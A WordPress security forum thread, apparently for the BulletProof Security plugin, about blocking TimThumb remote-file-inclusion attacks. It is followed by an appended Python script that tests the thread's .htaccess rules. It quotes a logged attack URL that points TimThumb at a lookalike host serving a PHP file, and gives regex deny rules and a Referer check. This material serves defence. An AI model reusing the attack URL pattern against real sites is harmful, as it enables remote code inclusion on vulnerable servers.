Timthumb protection – new attack type

  • #4306
    Bartek
    Member

    Dear BulletProof Team,

    I’m experiencing a new type of Timthumb attack on my website. I think it is not covered in the latest BulletProof Free version.
    Example: ../wp-content/plugins/sam-images/helpers/timthumb/image.php?src=http://flickr.com.hausundgartenshop24.de/parola.php
    The bot is attacking using ‘flickr.com’. To protect against it, I added ‘flickr’ to the .htaccess:

    RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(flickr|blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(flickr|blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]

    Thanks for great plugin!!
    Bartek

    #4316
    AITpro Admin
    Keymaster

    The top section of code in the timthumb security filter is a bit older. We added the HTTP_REFERER condition in a later version of BPS, which is a much better way of blocking any domain/an external Referrer from successfully exploiting timthumb files. That new condition protects against any external timthumb attack no matter what the originating/external domain name is. It would already block flickr. I assume you found the flickr timthumb attack logged in your Security Log, which means that it was successfully blocked/forbidden.

    # TIMTHUMB FORBID RFI and MISC FILE SKIP/BYPASS RULE
    # Only Allow Internal File Requests From Your Website
    # To Allow Additional Websites Access to a File Use [OR] as shown below.
    # RewriteCond %{HTTP_REFERER} ^.*YourWebsite.com.* [OR]
    # RewriteCond %{HTTP_REFERER} ^.*AnotherWebsite.com.*
    # Forbid (403) any request whose query string or request line carries a remote
    # URL (http/https/ftp, plain or %-encoded) pointing at one of the listed hosts;
    # [NC] makes the match case-insensitive, [OR] joins the two conditions.
    RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
    RewriteRule .* index.php [F,L]
    # Skip rule: when one of the thumbnail scripts is requested and the Referer
    # contains ait-pro.com (the site's own domain), [S=1] skips the one rule that
    # follows this one, so internal requests are not subjected to it.
    RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
    RewriteCond %{HTTP_REFERER} ^.*ait-pro.com.*
    RewriteRule . - [S=1]
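The two posts above set a QUERY_STRING host list against a Referer-based condition. The following Python script is an added example (not the BulletProof Security plugin's code, and not code posted by Bartek or AITpro Admin): it replays the attack query string from Bartek's post against the two QUERY_STRING patterns exactly as they appear in the thread, and beside them shows a `src`-host allow-list and a Referer gate that compare hostnames by domain suffix rather than by substring, so the `flickr.com.hausundgartenshop24.de` lookalike is rejected. `SITE_HOST` (example.com), `ALLOWED_IMAGE_HOSTS` and the sample requests are assumptions constructed for the example.

```python
# Added example for this thread (not code from BulletProof Security or from either
# poster): it replays the attack query string quoted by Bartek against the two
# QUERY_STRING patterns in the thread, then shows a Referer and src-host check
# that does not accept the "flickr.com.<attacker-domain>" lookalike hostname.
import re
from urllib.parse import parse_qs, urlsplit

# Query string of Bartek's example request (taken from the thread).
ATTACK_QS = "src=http://flickr.com.hausundgartenshop24.de/parola.php"

# Host alternation from the BPS filter as posted by AITpro Admin (no flickr)...
BPS_DOMAINS = (
    r"blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|"
    r"wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame"
)
# ...and Bartek's version, which prepends flickr.
BARTEK_DOMAINS = "flickr|" + BPS_DOMAINS

# Assumptions for the Referer/src checks: the protected site's own hostname and
# the image hosts the thumbnailer is meant to fetch from (both made up here).
SITE_HOST = "example.com"
ALLOWED_IMAGE_HOSTS = ("flickr.com", "imgur.com")


def query_string_rule(domains):
    """The RewriteCond %{QUERY_STRING} pattern from the thread, compiled with
    Python's re. It uses only syntax common to PCRE and re; [NC] maps to
    re.IGNORECASE."""
    pattern = (r"^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?("
               + domains + r").*$")
    return re.compile(pattern, re.IGNORECASE)


def blocked_by_query_rule(qs, domains=BPS_DOMAINS):
    """True when the .htaccess QUERY_STRING rule would 403 this query string."""
    return query_string_rule(domains).match(qs) is not None


def src_host(qs):
    """Hostname of the URL passed in the src= parameter, lowercased ('' if none)."""
    src = parse_qs(qs).get("src", [""])[0]
    return (urlsplit(src).hostname or "").lower()


def host_matches(host, allowed_host):
    """Domain-suffix match: host is allowed_host itself or a subdomain of it.
    'flickr.com.hausundgartenshop24.de' does not match 'flickr.com'."""
    return host == allowed_host or host.endswith("." + allowed_host)


def substring_matches(host, allowed_host):
    """Bare substring test, the form of a ^.*domain.* pattern; this is the
    comparison the lookalike hostname in the attack URL is crafted to pass."""
    return allowed_host in host


def src_allowed(qs, allowed=ALLOWED_IMAGE_HOSTS, match=host_matches):
    """Allow-list check on the src host; `match` selects the comparison used."""
    host = src_host(qs)
    return bool(host) and any(match(host, a) for a in allowed)


def referer_internal(referer, site_host=SITE_HOST, match=host_matches):
    """Referer gate: only requests whose Referer names the site itself may reach
    the thumbnail script. A missing Referer counts as external."""
    if not referer:
        return False
    host = (urlsplit(referer).hostname or "").lower()
    return match(host, site_host)


if __name__ == "__main__":
    # Constructed sample requests: (query string, Referer header value).
    samples = [
        (ATTACK_QS, ""),
        ("src=http://farm1.static.flickr.com/1/photo.jpg", "http://example.com/gallery"),
        ("src=http://imgur.com/abc.png", "http://example.com.evil.test/"),
    ]
    for qs, ref in samples:
        print(qs, "| referer:", ref or "(none)")
        print("  BPS query rule blocks:        ", blocked_by_query_rule(qs))
        print("  Bartek query rule blocks:     ", blocked_by_query_rule(qs, BARTEK_DOMAINS))
        print("  src host allowed (substring): ", src_allowed(qs, match=substring_matches))
        print("  src host allowed (domain):    ", src_allowed(qs))
        print("  referer internal (substring): ", referer_internal(ref, match=substring_matches))
        print("  referer internal (domain):    ", referer_internal(ref))
```

Run it directly for a per-request report. The QUERY_STRING pattern is carried over verbatim; the THE_REQUEST line in the thread applies the same pattern to the request line and is not repeated here. The contrast between `substring_matches` and `host_matches` is the point of the hostname in the attack URL: `flickr.com` is a substring of `flickr.com.hausundgartenshop24.de` but not its domain, so any allow-list or Referer check of the `^.*domain.*` form accepts it, while the suffix comparison does not. Note also that adding a host to the QUERY_STRING list blocks legitimate image fetches from that host as well, which is why a Referer gate on the site's own domain is the less disruptive control.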